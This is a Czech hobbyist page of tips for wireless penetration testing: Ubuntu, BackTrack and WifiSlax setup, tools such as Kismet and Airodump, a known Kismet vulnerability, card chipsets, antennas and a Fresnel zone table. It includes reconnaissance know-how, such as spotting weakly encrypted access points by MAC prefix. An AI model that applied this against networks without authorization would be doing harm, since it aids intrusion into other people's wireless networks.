Vše, co stahujete pomoci wget, najdete ve složce kde aplikaci použijete. Stejne tak log aplikace Airodump. Standardně home adresář uživatele /home/user nebo v Backtrack a Wifislax /root (protože se do systému přihlásite rovnou jako root).
DVD ISO Ubuntu 6.06.1 můžete objednat poštou nebo stáhnout napr. zde
Před instalací operačního systému se raději poraďte. Disk rozdělte předem. Čistá instalace je nekomplikovaná i pro nezkušeného uživatele. Rozdelení hardisku u instalace Ubuntu vyžaduje oznacit „/“ a „/swap“. Pro / nadělte 5 až 10 GB prostor, pro swap maximálně 1GB.
Pro jednorázový penetrační test vystacite s LiveCD BackTrack, WifiSlax nebo se starším Auditor. Tyto distribuce v ISO lze pred vypalenim modifikovat. Není je potřeba instalovat. LiveCD aplikace misto hardisku používá operační paměť.
Každou aplikaci [Wellenreiter, Nessus, Hydra, Kismet, Metasploit a pod.] obsažena v specializovaných distribucích, je možné instalovat a provozovat i pod Ubuntu. Obdoba specializovanych CD je nUbuntu.
MAC Access Pointu která začíná 00:60:B3 nemá sifrovani silnější než 128 bit. Jedná se o home made. AP je v tomto případě počítač s kartou Z-Com (Debian + hostapd). Karta Z-Com neumi 256bit sifrovani ani WPA.
Nepouzivejte Kismet starsi jako verze 2005.08.R1. Je dokumentovana (kriticka) chyba (integer underflow). U zpracovani netisknutelnych znaku v SSID (zpracování souboru pcap - rozklad datových ramcu) umozní spustit libovolny(?) kód.
Wifi kartu nakupujte vyhradne podle chipsetu. Osvedceny je Prism (hostap) a Atheros (madwifi). RTL8180 funguje. (napr. Edimax EW-7126 PCI). Géčkova verze už má jiny chipset.
Mimo „stůl“ bez vhodne anteny ztracite cas.
Vyzařovací uhel wifi anteny 30 nebo vic stupnu je vhodný pro detekci bezdrátových sítí. Pro připojení na větší vzdálenost (> 2km) v zarušeném prostředí se nehodí. Protoze na jedne frekvenci muze byt vice AP a frekvence se v pasmu 2,4GHz prolinaji, vzdy zachytite i nezadouci trafik (rušení). Vhodna antena je uzce (8°) směrová. Když antena není umistena v otevrenem prostoru, je vhodne pouzit antenu ktera „nesviti“ dozadu. Umístěním na zeď lze příjem citelně ovlyvnit (negativně). Ideálni je plná parabola. SWR je důležitější parametr než zisk nebo útlum. V kombinaci se širším vyzařovacím uhlem nemusíte se vzdálenějšim Access Pointem (detekovanem v Airodump) vůbec ustavit spojení. Plnohodnotné spojení (dle karty a ovladaču) vyžaduje minimálni hodnoty, jinak se spojení rozpadne.

Oficiálni minimum u CM9 je -95dB, Z-Com -92dB (myslím, že Z-Com je v reálu někde kolem -85dB). Orientačně: Rate 1Mbit, 15dB smerova antena = 4 km

Tabulka - Fresnelova zóna:

Vzdálenost [m]	Pásmo [m]
Vzdálenost [m]	2,4 GHz	5 GHz
100	1,37	1,22
200	1,93	1,73
300	2,37	2,12
400	2,73	2,44
500	3,06	2,73
700	3,62	3,23
1000	4,32	3,87
1200	4,73	4,23
1500	5,29	4,73
2000	6,11	5,47

Nepokládejte konektor pigtailu na topení. Pokud máte starší (kovovou) totálni endoprotézu loketního kloubu, držte anténu druhou rukou :-)